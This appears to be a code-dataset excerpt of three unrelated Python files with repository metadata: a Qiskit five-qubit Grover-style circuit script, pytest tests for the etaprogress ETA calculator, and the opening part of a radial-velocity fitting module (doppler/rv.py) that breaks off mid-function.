# qubit number=5 # total number=41 import cirq import qiskit from qiskit.providers.aer import QasmSimulator from qiskit.test.mock import FakeVigo from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister from qiskit import BasicAer, execute, transpile from pprint import pprint from qiskit.test.mock import FakeVigo from math import log2,floor, sqrt, pi import numpy as np import networkx as nx def build_oracle(n: int, f) -> QuantumCircuit: # implement the oracle O_f^\pm # NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate # or multi_control_Z_gate (issue #127) controls = QuantumRegister(n, "ofc") oracle = QuantumCircuit(controls, name="Zf") for i in range(2 ** n): rep = np.binary_repr(i, n) if f(rep) == "1": for j in range(n): if rep[j] == "0": oracle.x(controls[j]) # oracle.h(controls[n]) if n >= 2: oracle.mcu1(pi, controls[1:], controls[0]) for j in range(n): if rep[j] == "0": oracle.x(controls[j]) # oracle.barrier() return oracle def make_circuit(n:int,f) -> QuantumCircuit: # circuit begin input_qubit = QuantumRegister(n,"qc") classical = ClassicalRegister(n, "qm") prog = QuantumCircuit(input_qubit, classical) prog.h(input_qubit[0]) # number=3 prog.h(input_qubit[1]) # number=4 prog.h(input_qubit[2]) # number=5 prog.h(input_qubit[3]) # number=6 prog.h(input_qubit[4]) # number=21 prog.cx(input_qubit[3],input_qubit[0]) # number=32 prog.z(input_qubit[3]) # number=33 prog.cx(input_qubit[3],input_qubit[0]) # number=34 prog.rx(0.11938052083641225,input_qubit[1]) # number=36 Zf = build_oracle(n, f) repeat = floor(sqrt(2 ** n) * pi / 4) for i in range(repeat): prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)]) prog.h(input_qubit[0]) # number=1 prog.rx(1.4765485471872026,input_qubit[2]) # number=35 prog.h(input_qubit[1]) # number=2 prog.h(input_qubit[2]) # number=7 prog.h(input_qubit[3]) # number=8 prog.cx(input_qubit[1],input_qubit[0]) # number=38 prog.x(input_qubit[0]) # number=39 prog.cx(input_qubit[1],input_qubit[0]) # number=40 prog.x(input_qubit[4]) # number=30 prog.x(input_qubit[1]) # number=10 prog.x(input_qubit[2]) # number=11 prog.rx(-2.5258404934861938,input_qubit[1]) # number=25 prog.h(input_qubit[3]) # number=29 prog.cx(input_qubit[0],input_qubit[3]) # number=22 prog.x(input_qubit[3]) # number=23 prog.cx(input_qubit[0],input_qubit[3]) # number=24 if n>=2: prog.mcu1(pi,input_qubit[1:],input_qubit[0]) prog.x(input_qubit[0]) # number=13 prog.rx(-0.0722566310325653,input_qubit[4]) # number=37 prog.x(input_qubit[1]) # number=14 prog.cx(input_qubit[0],input_qubit[2]) # number=26 prog.x(input_qubit[2]) # number=27 prog.cx(input_qubit[0],input_qubit[2]) # number=28 prog.x(input_qubit[3]) # number=16 prog.h(input_qubit[0]) # number=17 prog.h(input_qubit[1]) # number=18 prog.h(input_qubit[2]) # number=19 prog.h(input_qubit[3]) # number=20 # circuit end for i in range(n): prog.measure(input_qubit[i], classical[i]) return prog if __name__ == '__main__': key = "00000" f = lambda rep: str(int(rep == key)) prog = make_circuit(5,f) backend = FakeVigo() sample_shot =7924 info = execute(prog, backend=backend, shots=sample_shot).result().get_counts() backend = FakeVigo() circuit1 = transpile(prog,backend,optimization_level=2) writefile = open("../data/startQiskit_noisy1011.csv","w") print(info,file=writefile) print("results end", file=writefile) print(circuit1.depth(),file=writefile) print(circuit1,file=writefile) writefile.close()
31.53125
82
0.61893
e5b009d0d07e01f4929836786ce1cb730508c633
3,506
py
Python
tests/test_eta_3_simple.py
Robpol86/etaprogress
224e8a248c2bf820bad218763281914ad3983fff
[ "MIT" ]
13
2015-08-25T05:54:21.000Z
2021-03-23T15:56:58.000Z
tests/test_eta_3_simple.py
Robpol86/etaprogress
224e8a248c2bf820bad218763281914ad3983fff
[ "MIT" ]
5
2015-03-14T16:31:38.000Z
2019-01-13T20:46:25.000Z
tests/test_eta_3_simple.py
Robpol86/etaprogress
224e8a248c2bf820bad218763281914ad3983fff
[ "MIT" ]
5
2015-05-31T14:16:50.000Z
2021-02-06T11:23:43.000Z
from etaprogress import eta def test_one(): eta_instance = eta.ETA(1) eta._NOW = lambda: 1411868722.680839 eta_instance.set_numerator(1) assert 1 == eta_instance.denominator assert eta_instance.eta_epoch is None assert 0.0 == eta_instance.rate assert 1 == eta_instance.numerator assert eta_instance.stalled is True assert eta_instance.started is False assert eta_instance.undefined is False assert eta_instance.done is True assert eta_instance.eta_seconds is None assert 100.0 == eta_instance.percent assert 0.0 == eta_instance.elapsed def test_two(): eta_instance = eta.ETA(2) eta._NOW = lambda: 1411868721.680839 eta_instance.set_numerator(1) assert 2 == eta_instance.denominator assert eta_instance.eta_epoch is None assert 0.0 == eta_instance.rate assert 1 == eta_instance.numerator assert eta_instance.stalled is True assert eta_instance.started is False assert eta_instance.undefined is False assert eta_instance.done is False assert eta_instance.eta_seconds is None assert 50.0 == eta_instance.percent assert 0.0 == eta_instance.elapsed eta._NOW = lambda: 1411868722.680839 eta_instance.set_numerator(2) assert 2 == eta_instance.denominator assert 2 == eta_instance.numerator assert eta_instance.started is True assert eta_instance.undefined is False assert eta_instance.done is True assert 100.0 == eta_instance.percent def test_five(): eta._NOW = lambda: 1411868720.680839 eta_instance = eta.ETA(5) eta._NOW = lambda: 1411868721.680839 eta_instance.set_numerator(1) assert 5 == eta_instance.denominator assert eta_instance.eta_epoch is None assert 0.0 == eta_instance.rate assert 1 == eta_instance.numerator assert eta_instance.stalled is True assert eta_instance.started is False assert eta_instance.undefined is False assert eta_instance.done is False assert eta_instance.eta_seconds is None assert 20.0 == eta_instance.percent assert 0.0 == eta_instance.elapsed eta._NOW = lambda: 1411868722.680839 eta_instance.set_numerator(2) assert 5 == eta_instance.denominator assert 1411868725.680839 == eta_instance.eta_epoch assert 1.0 == eta_instance.rate assert 2 == eta_instance.numerator assert eta_instance.stalled is False assert eta_instance.started is True assert eta_instance.undefined is False assert eta_instance.done is False assert 3.0 == eta_instance.eta_seconds assert 40.0 == eta_instance.percent assert 2.0 == eta_instance.elapsed eta._NOW = lambda: 1411868723.680839 eta_instance.set_numerator(3) assert 5 == eta_instance.denominator assert 1411868725.680839 == eta_instance.eta_epoch assert 1.0 == eta_instance.rate assert 3 == eta_instance.numerator assert eta_instance.stalled is False assert eta_instance.started is True assert eta_instance.undefined is False assert eta_instance.done is False assert 2.0 == eta_instance.eta_seconds assert 60.0 == eta_instance.percent assert 3.0 == eta_instance.elapsed eta._NOW = lambda: 1411868725.680839 eta_instance.set_numerator(5) assert 5 == eta_instance.denominator assert 5 == eta_instance.numerator assert eta_instance.started is True assert eta_instance.undefined is False assert eta_instance.done is True assert 100.0 == eta_instance.percent assert 5.0 == eta_instance.elapsed
33.711538
54
0.736737
e14320e18a07497f6d86105edc01d72f6fb68b18
145,198
py
Python
doppler/rv.py
dnidever/radvel
7e97ee6537b69bfd4bde7e30d8b3639b00507163
[ "MIT" ]
null
null
null
doppler/rv.py
dnidever/radvel
7e97ee6537b69bfd4bde7e30d8b3639b00507163
[ "MIT" ]
null
null
null
doppler/rv.py
dnidever/radvel
7e97ee6537b69bfd4bde7e30d8b3639b00507163
[ "MIT" ]
null
null
null
#!/usr/bin/env python """RV.PY - Generic Radial Velocity Software """ from __future__ import print_function __authors__ = 'David Nidever <dnidever@montana.edu>' __version__ = '20210605' # yyyymmdd import os #import sys, traceback import contextlib, io, sys import numpy as np import warnings from astropy.io import fits from astropy.table import Table import astropy.units as u from astropy.time import Time from astropy.coordinates import SkyCoord, EarthLocation from astropy.wcs import WCS from scipy.ndimage.filters import median_filter,gaussian_filter1d from dlnpyutils.minpack import curve_fit from scipy.optimize import least_squares from scipy.interpolate import interp1d import thecannon as tc from dlnpyutils import utils as dln, bindata from .spec1d import Spec1D from . import (cannon,payne,utils,reader) import copy import emcee import corner import logging import time import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt from matplotlib.legend import Legend import subprocess try: import __builtin__ as builtins # Python 2 except ImportError: import builtins # Python 3 # Ignore these warnings, it's a bug warnings.filterwarnings("ignore", message="numpy.dtype size changed") warnings.filterwarnings("ignore", message="numpy.ufunc size changed") cspeed = 2.99792458e5 # speed of light in km/s def xcorr_dtype(nlag): """Return the dtype for the xcorr structure""" dtype = np.dtype([("xshift0",float),("ccp0",float),("xshift",float),("xshifterr",float), ("xshift_interp",float),("ccf",(float,nlag)),("ccferr",(float,nlag)),("ccnlag",int), ("cclag",(int,nlag)),("ccpeak",float),("ccpfwhm",float),("ccp_pars",(float,4)), ("ccp_perror",(float,4)),("ccp_polycoef",(float,4)),("vrel",float), ("vrelerr",float),("w0",float),("dw",float),("chisq",float)]) return dtype # astropy.modeling can handle errors and constraints # https://stackoverflow.com/questions/2828953/silence-the-stdout-of-a-function-in-python-without-trashing-sys-stdout-and-resto # usage: # with mute(): # foo() @contextlib.contextmanager def mute(): '''Prevent print to stdout, but if there was an error then catch it and print the output before raising the error.''' saved_stdout = sys.stdout saved_stderr = sys.stderr sys.stdout = io.StringIO() sys.stderr = io.StringIO() try: yield except Exception: saved_output = sys.stdout saved_outerr = sys.stderr sys.stdout = saved_stdout sys.stderr = saved_stderr print(saved_output.getvalue()) print(saved_outerr.getvalue()) raise sys.stdout = saved_stdout sys.stderr = saved_stderr def tweakcontinuum(spec,model,smlen=None,usepoly=False,polyorder=3): """ Tweak the continuum normalization of an observed spectrum using a good-fit model.""" if smlen is None: smlen = spec.npix/10.0 if hasattr(spec,'cont') is False: spec.cont = spec.flux.copy()*0+1 # Loop over orders for i in range(spec.norder): if spec.norder==1: ratio = spec.flux/model.flux mask = spec.mask gd,ngd,bd,nbd = dln.where((mask==False) & (spec.flux>0) & np.isfinite(spec.flux),comp=True) else: ratio = spec.flux[:,i]/model.flux[:,i] mask = spec.mask[:,i] gd,ngd,bd,nbd = dln.where((mask==False) & (spec.flux[:,i]>0) & np.isfinite(spec.flux[:,i]),comp=True) # Set bad pixels to NaN, gsmooth masks those out if nbd>0: ratio[bd] = np.nan ratio[0] = np.nanmedian(ratio[0:np.int(smlen/2)]) ratio[-1] = np.nanmedian(ratio[-np.int(smlen/2):-1]) # Use Gaussian Smoothing if usepoly is False: sm = dln.gsmooth(ratio,smlen,boundary='extend') # Use low-order,polynomial else: x = np.linspace(-1,1,spec.npix) coef = dln.poly_fit(x[gd],ratio[gd]-1,polyorder) sm = dln.poly(x,coef)+1 # Deal with any remaining NaNs bd, = np.where(np.isfinite(sm)==False) if len(bd)>0: sm[bd] = 1.0 if spec.norder==1: spec.cont *= sm spec.flux /= sm spec.err /= sm else: spec.cont[:,i] *= sm spec.flux[:,i] /= sm spec.err[:,i] /= sm return spec def specfigure(figfile,spec,fmodel,out,annotlabels=None,original=None,verbose=True,figsize=10,ispayne=False): """ Make diagnostic figure. Parameters ---------- figfile : str Output figure filename. spec : Spec1D object The observed spectrum used for the fitting (normalized, masked and tweaked). fmodel : Spec1D object The best-fitting model (Cannon or Payne) spectrum. out : numpy structured array Catalog of best-fitting values to use for the annotation. annotlabels : list, optional The list of labels to use for the annotation. Default is ['teff','logg','feh','vrel']. original : Spec1D object, optional The original but normalized spectrum. Not tweaked or masked. verbose : boolean, optional Verbose output. Default is True. figsize : float, optional Figure size to use. Default is 10 inches. ispayne: boolean, optional Is this a Payne model. Default is False. Returns ------- Figure is saved to figfile. Example ------- .. code-block:: python specfigure(figfile,specm,fmodel,out,original=orig,verbose=True,ispayne=True,annotlabels=annotlabels) """ print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging if annotlabels is None: annotlabels = ['teff','logg','feh','vrel'] #import matplotlib matplotlib.use('Agg') #import matplotlib.pyplot as plt if os.path.exists(figfile): os.remove(figfile) norder = spec.norder nlegcol = 2 if original is not None: nlegcol=3 # Single-order plot if norder==1: fig,ax = plt.subplots() fig.set_figheight(figsize*0.5) fig.set_figwidth(figsize) if original is not None: plt.plot(original.wave,original.flux,color='green',label='Original',linewidth=1) plt.plot(spec.wave,spec.flux,'b',label='Masked Data',linewidth=1) plt.plot(fmodel.wave,fmodel.flux,'r',label='Model',linewidth=1,alpha=0.8) leg = ax.legend(loc='upper left', frameon=True, framealpha=0.8, ncol=nlegcol) plt.xlabel('Wavelength (Angstroms)') plt.ylabel('Normalized Flux') xr = dln.minmax(spec.wave) yr = [np.min([spec.flux,fmodel.flux]), np.max([spec.flux,fmodel.flux])] if original is not None: yr = [np.min([original.flux,spec.flux,fmodel.flux]), np.max([spec.flux,fmodel.flux])] yr = [yr[0]-dln.valrange(yr)*0.15,yr[1]+dln.valrange(yr)*0.005] yr = [np.max([yr[0],-0.2]), np.min([yr[1],2.0])] plt.xlim(xr) plt.ylim(yr) snr = np.nanmedian(spec.flux/spec.err) plt.title(spec.filename) if ispayne is False: ax.annotate(r'S/N=%5.1f Teff=%5.1f$\pm$%5.1f logg=%5.2f$\pm$%5.2f [Fe/H]=%5.2f$\pm$%5.2f Vrel=%5.2f$\pm$%5.2f chisq=%5.2f' % (snr, out['teff'], out['tefferr'], out['logg'], out['loggerr'], out['feh'], out['feherr'], out['vrel'], out['vrelerr'], out['chisq']), xy=(np.mean(xr), yr[0]+dln.valrange(yr)*0.05),ha='center') else: fmt = r'S/N=%5.1f ' annotarr = [snr] for k,name in enumerate(annotlabels): fmt += r''+name+'=%5.1f$\pm$%5.1f ' annotarr += [dln.first_el(out[name]),dln.first_el(out[name+'err'])] fmt += r' chisq=%5.2f' annotarr += [dln.first_el(out['chisq'])] ax.annotate(fmt % tuple(annotarr), xy=(np.mean(xr), yr[0]+dln.valrange(yr)*0.05),ha='center') # Multi-order plot else: fig,ax = plt.subplots(norder) fig.set_figheight(figsize) fig.set_figwidth(figsize) for i in range(norder): if original is not None: ax[i].plot(original.wave[:,i],original.flux[:,i],color='green',label='Original',linewidth=1) ax[i].plot(spec.wave[:,i],spec.flux[:,i],'b',label='Masked Data',linewidth=1) ax[i].plot(fmodel.wave[:,i],fmodel.flux[:,i],'r',label='Model',linewidth=1,alpha=0.8) if i==0: leg = ax[i].legend(loc='upper left', frameon=True, framealpha=0.8, ncol=nlegcol) ax[i].set_xlabel('Wavelength (Angstroms)') ax[i].set_ylabel('Normalized Flux') xr = dln.minmax(spec.wave[:,i]) yr = [np.min([spec.flux[:,i],fmodel.flux[:,i]]), np.max([spec.flux[:,i],fmodel.flux[:,i]])] if original is not None: yr = [np.min([original.flux[:,i],spec.flux[:,i],fmodel.flux[:,i]]), np.max([spec.flux[:,i],fmodel.flux[:,i]])] yr = [yr[0]-dln.valrange(yr)*0.05,yr[1]+dln.valrange(yr)*0.05] if i==0: yr = [yr[0]-dln.valrange(yr)*0.15,yr[1]+dln.valrange(yr)*0.05] yr = [np.max([yr[0],-0.2]), np.min([yr[1],2.0])] ax[i].set_xlim(xr) ax[i].set_ylim(yr) # legend if i==0: snr = np.nanmedian(spec.flux/spec.err) ax[i].set_title(spec.filename) if ispayne is False: ax[i].annotate(r'S/N=%5.1f Teff=%5.1f$\pm$%5.1f logg=%5.2f$\pm$%5.2f [Fe/H]=%5.2f$\pm$%5.2f Vrel=%5.2f$\pm$%5.2f chisq=%5.2f' % (snr,out['teff'],out['tefferr'],out['logg'],out['loggerr'],out['feh'],out['feherr'],out['vrel'],out['vrelerr'],out['chisq']), xy=(np.mean(xr), yr[0]+dln.valrange(yr)*0.05),ha='center') else: fmt = r'S/N=%5.1f ' annotarr = [snr] for k,name in enumerate(annotlabels): fmt += r''+name+'=%5.1f$\pm$%5.1f ' annotarr += [dln.first_el(out[name]),dln.first_el(out[name+'err'])] fmt += r' chisq=%5.2f' annotarr += [dln.first_el(out['chisq'])] ax[i].annotate(fmt % tuple(annotarr), xy=(np.mean(xr), yr[0]+dln.valrange(yr)*0.05),ha='center') plt.savefig(figfile,bbox_inches='tight') plt.close(fig) if verbose is True: print('Figure saved to '+figfile) def ccorrelate(x, y, lag, yerr=None, covariance=False, double=None, nomean=False): """This function computes the cross correlation of two samples. This function computes the cross correlation Pxy(L) or cross covariance Rxy(L) of two sample populations X and Y as a function of the lag (L). This was translated from APC_CORRELATE.PRO which was itself a modification to the IDL C_CORRELATE.PRO function. Parameters ---------- x : array The first array to cross correlate (e.g., the template). If y is 2D (e.g., [Npix,Norder]), then x can be either 2D or 1D. If x is 1D, then the cross-correlation is performed between x and each order of y and a 2D array will be output. If x is 2D, then the cross-correlation of each order of x and y is performed and the results combined. y : array The second array to cross correlate. Must be the same lenght as x. Can be 2D (e.g., [Npix, Norder]), but the shifting is always done on the 1st dimension. lag : array Vector that specifies the absolute distance(s) between indexed elements of x in the interval [-(n-2), (n-2)]. yerr : array, optional Array of uncertainties in y. Must be the same shape as y. covariange : bool If true, then the sample cross covariance is computed. Returns ------- cross : array The cross correlation or cross covariance. cerror : array The uncertainty in "cross". Only if "yerr" is input. Example ------- Define two n-element sample populations. .. code-block:: python x = [3.73, 3.67, 3.77, 3.83, 4.67, 5.87, 6.70, 6.97, 6.40, 5.57] y = [2.31, 2.76, 3.02, 3.13, 3.72, 3.88, 3.97, 4.39, 4.34, 3.95] Compute the cross correlation of X and Y for LAG = -5, 0, 1, 5, 6, 7 .. code-block:: python lag = [-5, 0, 1, 5, 6, 7] result = ccorrelate(x, y, lag) The result should be: .. code-block:: python [-0.428246, 0.914755, 0.674547, -0.405140, -0.403100, -0.339685] """ # Compute the sample cross correlation or cross covariance of # (Xt, Xt+l) and (Yt, Yt+l) as a function of the lag (l). xshape = x.shape yshape = y.shape nx = xshape[0] if x.ndim==1: nxorder = 1 else: nxorder = xshape[1] ny = yshape[0] if y.ndim==1: nyorder = 1 else: nyorder = yshape[1] npix = nx norder = np.maximum(nxorder,nyorder) # Check the inputs if (nx != len(y)): raise ValueError("X and Y arrays must have the same number of pixels in 1st dimension.") if (x.ndim>2) | (y.ndim>2): raise ValueError("X and Y must be 1D or 2D.") if (x.ndim==2) & (y.ndim==1): raise ValueError("If X is 2D then Y must be as well.") # If X and Y are 2D then their Norders must be the same if (x.ndim==2) & (y.ndim==2) & (nxorder!=nyorder): raise ValueError("If X and Y are 2D then their length in the 2nd dimension must be the same.") # Check that Y and Yerr have the same length if yerr is not None: if (y.shape != yerr.shape): raise ValueError("Y and Yerr must have the same shape.") if (nx<2): raise ValueError("X and Y arrays must contain 2 or more elements.") # Reshape arrays to [Npix,Norder], even if both are 1D xd = x.copy() yd = y.copy() if yerr is not None: yderr=yerr.copy() if (norder>1): if (x.ndim==1): # make multiple copies of X xd = yd.copy()*0.0 for i in range(norder): xd[:,i] = x.copy() else: xd = xd.reshape(npix,1) yd = yd.reshape(npix,1) if yerr is not None: yderr = yderr.reshape(npix,1) # Remove the means if nomean is False: for i in range(norder): xd[:,i] -= np.nanmean(xd[:,i]) yd[:,i] -= np.nanmean(yd[:,i]) # Set NaNs or Infs to 0.0, mask bad pixels fx = np.isfinite(xd) ngdx = np.sum(fx) nbdx = np.sum((fx==False)) if nbdx>0: xd[(fx==False)]=0.0 fy = np.isfinite(yd) if yerr is not None: fy &= (yderr<1e20) # mask out high errors as well ngdy = np.sum(fy) nbdy = np.sum((fy==False)) if nbdy>0: yd[(fy==False)]=0.0 if yerr is not None: yderr[(fy==False)]=0.0 nlag = len(lag) # MULTI-ORDER with ONE template and ONE spectrum to cross-correlate ################################################################### # This is 2.3x faster than the original method down below # for (4936, 3) spectra and nlag=765 if (norder>1) & (nxorder == nyorder): # Initialize the output arrays cross = np.zeros(nlag,dtype=float) cross_error = np.zeros(nlag,dtype=float) num = np.zeros(nlag,dtype=int) # number of "good" points at this lag # flatten multi-order to 1D with buffer buff = np.max(np.abs(lag)) xd1 = np.zeros(nx*norder + (norder-1)*buff,float) yd1 = np.zeros(nx*norder + (norder-1)*buff,float) yderr1 = np.zeros(nx*norder + (norder-1)*buff,float) fx1 = np.zeros(nx*norder + (norder-1)*buff,bool) fy1 = np.zeros(nx*norder + (norder-1)*buff,bool) for i in range(norder): lo = i*(nx+buff) hi = lo+nx xd1[lo:hi] = xd[:,i] yd1[lo:hi] = yd[:,i] yderr1[lo:hi] = yderr[:,i] fx1[lo:hi] = fx[:,i] fy1[lo:hi] = fy[:,i] nx1 = len(xd1) # Loop over lag points for k in range(nlag): # Note the reversal of the variables for negative lags. if lag[k]>0: cross[k] = np.sum(xd1[0:nx1-lag[k]] * yd1[lag[k]:]) num[k] = np.sum(fx1[0:nx1-lag[k]] * fy1[lag[k]:]) if yerr is not None: cross_error[k] = np.sum( (xd1[0:nx1-lag[k]] * yderr1[lag[k]:])**2 ) else: cross[k] = np.sum(yd1[0:nx1+lag[k]] * xd1[-lag[k]:]) num[k] = np.sum(fy1[0:nx1+lag[k]] * fx1[-lag[k]:]) if yerr is not None: cross_error[k] = np.sum( (yderr1[0:nx1+lag[k]] * xd1[-lag[k]:])**2 ) rmsx = np.sqrt(np.sum((xd*fx)**2)) if rmsx==0.0: rmsx=1.0 rmsy = np.sqrt(np.sum((yd*fy)**2)) if rmsy==0.0: rmsy=1.0 # Normalize by number of "good" points cross *= np.max(num) pnum = (num>0) cross[pnum] /= num[pnum] # normalize by number of "good" points # Take sqrt to finish adding errors in quadrature cross_error = np.sqrt(cross_error) # normalize cross_error *= np.max(num) cross_error[pnum] /= num[pnum] # Divide by N for covariance, or divide by variance for correlation. nelements = npix*norder if covariance is True: cross /= nelements cross_error /= nelements else: cross /= rmsx*rmsy cross_error /= rmsx*rmsy # SIGLE-ORDER OR ONE template with MULTIPLE spectrum to cross-correlate ####################################################################### else: # Initialize the output arrays cross = np.zeros((nlag,norder),dtype=float) cross_error = np.zeros((nlag,norder),dtype=float) num = np.zeros((nlag,norder),dtype=int) # number of "good" points at this lag rmsx = np.zeros(norder,dtype=float) rmsy = np.zeros(norder,dtype=float) # Loop over orders for i in range(norder): # Loop over lag points for k in range(nlag): # Note the reversal of the variables for negative lags. if lag[k]>0: cross[k,i] = np.sum(xd[0:nx-lag[k],i] * yd[lag[k]:,i]) num[k,i] = np.sum(fx[0:nx-lag[k],i] * fy[lag[k]:,i]) if yerr is not None: cross_error[k,i] = np.sum( (xd[0:nx-lag[k],i] * yderr[lag[k]:,i])**2 ) else: cross[k,i] = np.sum(yd[0:nx+lag[k],i] * xd[-lag[k]:,i]) num[k,i] = np.sum(fy[0:nx+lag[k],i] * fx[-lag[k]:,i]) if yerr is not None: cross_error[k,i] = np.sum( (yderr[0:nx+lag[k],i] * xd[-lag[k]:,i])**2 ) if (npix>2): rmsx[i] = np.sum(xd[fx[:,i],i]**2) if (rmsx[i]==0): rmsx[i]=1.0 rmsy[i] = np.sum(yd[fy[:,i],i]**2) if (rmsy[i]==0): rmsy[i]=1.0 else: rmsx[i] = 1.0 rmsy[i] = 1.0 # Both X and Y are 2D, sum data from multiple orders if (nxorder>1) & (nyorder>1): cross = np.sum(cross,axis=1).reshape(nlag,1) cross_error= np.sum(cross_error,axis=1).reshape(nlag,1) num = np.sum(num,axis=1).reshape(nlag,1) rmsx = np.sqrt(np.sum(rmsx,axis=0)).reshape(1) rmsy = np.sqrt(np.sum(rmsy,axis=0)).reshape(1) norder = 1 nelements = npix*norder else: rmsx = np.sqrt(rmsx) rmsy = np.sqrt(rmsy) nelements = npix # Normalizations for i in range(norder): # Normalize by number of "good" points cross[:,i] *= np.max(num[:,i]) pnum = (num[:,i]>0) cross[pnum,i] /= num[pnum,i] # normalize by number of "good" points # Take sqrt to finish adding errors in quadrature cross_error[:,i] = np.sqrt(cross_error[:,i]) # normalize cross_error[:,i] *= np.max(num[:,i]) cross_error[pnum,i] /= num[pnum,i] # Divide by N for covariance, or divide by variance for correlation. if covariance is True: cross[:,i] /= nelements cross_error[:,i] /= nelements else: cross[:,i] /= rmsx[i]*rmsy[i] cross_error[:,i] /= rmsx[i]*rmsy[i] # Flatten to 1D if norder=1 if norder==1: cross = cross.flatten() cross_error = cross_error.flatten() if yerr is not None: return cross, cross_error return cross def specxcorr(wave=None,tempspec=None,obsspec=None,obserr=None,maxlag=200,errccf=False,prior=None): """This measures the radial velocity of a spectrum vs. a template using cross-correlation. This program measures the cross-correlation shift between a template spectrum (can be synthetic or observed) and an observed spectrum (or multiple spectra) on the same logarithmic wavelength scale. Parameters ---------- wave : array The wavelength array. tempspec : The template spectrum: normalized and on log-lambda scale. obsspec : array The observed spectra: normalized and sampled on tempspec scale. obserr : array The observed error; normalized and sampled on tempspec scale. maxlag : int The maximum lag or shift to explore. prior : array, optional Set a Gaussian prior on the cross-correlation. The first term is the central position (in pixel shift) and the second term is the Gaussian sigma (in pixels). Returns ------- outstr : numpy structured array The output structure of the final derived RVs and errors. auto : array The auto-correlation function of the template Examples -------- .. code-block:: python out = apxcorr(wave,tempspec,spec,err) """ # Not enough inputs if (wave is None) | (tempspec is None) | (obsspec is None) | (obserr is None): raise ValueError('Syntax - out = apxcorr(wave,tempspec,spec,err,auto=auto)') return nwave = len(wave) # Are there multiple observed spectra if obsspec.ndim>1: nspec = obsspec.shape[1] else: nspec = 1 # Set up the cross-correlation parameters # this only gives +/-450 km/s with 2048 pixels, maybe use larger range nlag = 2*np.round(np.abs(maxlag))+1 if ((nlag % 2) == 0): nlag +=1 # make sure nlag is odd dlag = 1 minlag = -np.int(np.ceil(nlag/2)) lag = np.arange(nlag)*dlag+minlag+1 # Initialize the output structure outstr = np.zeros(1,dtype=xcorr_dtype(nlag)) outstr["xshift"] = np.nan outstr["xshifterr"] = np.nan outstr["vrel"] = np.nan outstr["vrelerr"] = np.nan outstr["chisq"] = np.nan wobs = wave.copy() nw = len(wobs) spec = obsspec.copy() err = obserr.copy() template = tempspec.copy() # mask bad pixels, set to NAN sfix = (spec < 0.01) nsfix = np.sum(sfix) if nsfix>0: spec[sfix] = np.nan tfix = (template < 0.01) ntfix = np.sum(tfix) if ntfix>0: template[tfix] = np.nan # set cross-corrlation window to be good range + nlag #lo = (0 if (gd[0]-nlag)<0 else gd[0]-nlag) #hi = ((nw-1) if (gd[ngd-1]+nlag)>(nw-1) else gd[ngd-1]+nlag) nindobs = np.sum(np.isfinite(spec) == True) # only finite values, in case any NAN nindtemp = np.sum(np.isfinite(template) == True) # only finite values, in case any NAN if (nindobs>0) & (nindtemp>0): # Cross-Correlation #------------------ # Calculate the CCF uncertainties using propagation of errors # Make median filtered error array # high error values give crazy values in ccferr obserr1 = err.copy() if err.ndim==1: bderr = ((obserr1 > 1) | (obserr1 <= 0.0)) nbderr = np.sum(bderr) ngderr = np.sum((bderr==False)) if (nbderr > 0) & (ngderr > 1): obserr1[bderr]=np.median([obserr1[(bderr==False)]]) obserr1 = median_filter(obserr1,51) if err.ndim==2: for i in range(obserr1.shape[1]): oerr1 = obserr1[:,i] bderr = ((oerr1 > 1) | (oerr1 <= 0.0)) nbderr = np.sum(bderr) ngderr = np.sum((bderr==False)) if (nbderr > 0) & (ngderr > 1): oerr1[bderr]=np.median([oerr1[(bderr==False)]]) oerr1 = median_filter(oerr1,51) obserr1[:,i] = oerr1 # Run the cross-correlation ccf, ccferr = ccorrelate(template,spec,lag,obserr1) # Apply flat-topped Gaussian prior with unit amplitude # add a broader Gaussian underneath so the rest of the # CCF isn't completely lost if prior is not None: ccf *= np.exp(-0.5*(((lag-prior[0])/prior[1])**4))*0.8+np.exp(-0.5*(((lag-prior[0])/150)**2))*0.2 else: # no good pixels ccf = np.float(lag)*0.0 if (errccf is True) | (nofit is False): ccferr=ccf # Remove the median ccf -= np.median(ccf) # Best shift best_shiftind0 = np.argmax(ccf) best_xshift0 = lag[best_shiftind0] #temp = shift( tout, best_xshift0) temp = np.roll(template, best_xshift0, axis=0) # Find Chisq for each synthetic spectrum gdmask = (np.isfinite(spec)==True) & (np.isfinite(temp)==True) & (spec>0.0) & (err>0.0) & (err < 1e5) ngdpix = np.sum(gdmask) if (ngdpix==0): raise Exception('Bad spectrum') chisq = np.sqrt( np.sum( (spec[gdmask]-temp[gdmask])**2/err[gdmask]**2 )/ngdpix ) outstr["chisq"] = chisq outstr["ccf"] = ccf outstr["ccferr"] = ccferr outstr["ccnlag"] = nlag outstr["cclag"] = lag # Remove smooth background at large scales cont = gaussian_filter1d(ccf,100) ccf_diff = ccf-cont # Get peak of CCF best_shiftind = np.argmax(ccf_diff) best_xshift = lag[best_shiftind] # Fit ccf peak with a Gaussian plus a line #--------------------------------------------- # Some CCF peaks are SOOO wide that they span the whole width # do the first one without background subtraction estimates0 = [ccf_diff[best_shiftind0], best_xshift0, 4.0, 0.0] lbounds0 = [1e-3, np.min(lag), 0.1, -np.inf] ubounds0 = [np.inf, np.max(lag), np.max(lag), np.inf] pars0, cov0 = dln.gaussfit(lag,ccf_diff,estimates0,ccferr,bounds=(lbounds0,ubounds0)) perror0 = np.sqrt(np.diag(cov0)) # Fit the width # keep height, center and constant constrained estimates1 = pars0 estimates1[1] = best_xshift lbounds1 = [0.5*estimates1[0], best_xshift-4, 0.3*estimates1[2], dln.lt(np.min(ccf_diff),dln.lt(0,estimates1[3]-0.1)) ] ubounds1 = [1.5*estimates1[0], best_xshift+4, 1.5*estimates1[2], dln.gt(np.max(ccf_diff)*0.5,estimates1[3]+0.1) ] lo1 = np.int(dln.gt(np.floor(best_shiftind-dln.gt(estimates1[2]*2,5)),0)) hi1 = np.int(dln.lt(np.ceil(best_shiftind+dln.gt(estimates1[2]*2,5)),len(lag))) pars1, cov1 = dln.gaussfit(lag[lo1:hi1],ccf_diff[lo1:hi1],estimates1,ccferr[lo1:hi1],bounds=(lbounds1,ubounds1)) yfit1 = dln.gaussian(lag[lo1:hi1],*pars1) perror1 = np.sqrt(np.diag(cov1)) # Fefit and let constant vary more, keep width constrained estimates2 = pars1 estimates2[1] = dln.limit(estimates2[1],np.min(lag),np.max(lag)) # must be in range estimates2[3] = np.median(ccf_diff[lo1:hi1]-yfit1) + pars1[3] lbounds2 = [0.5*estimates2[0], 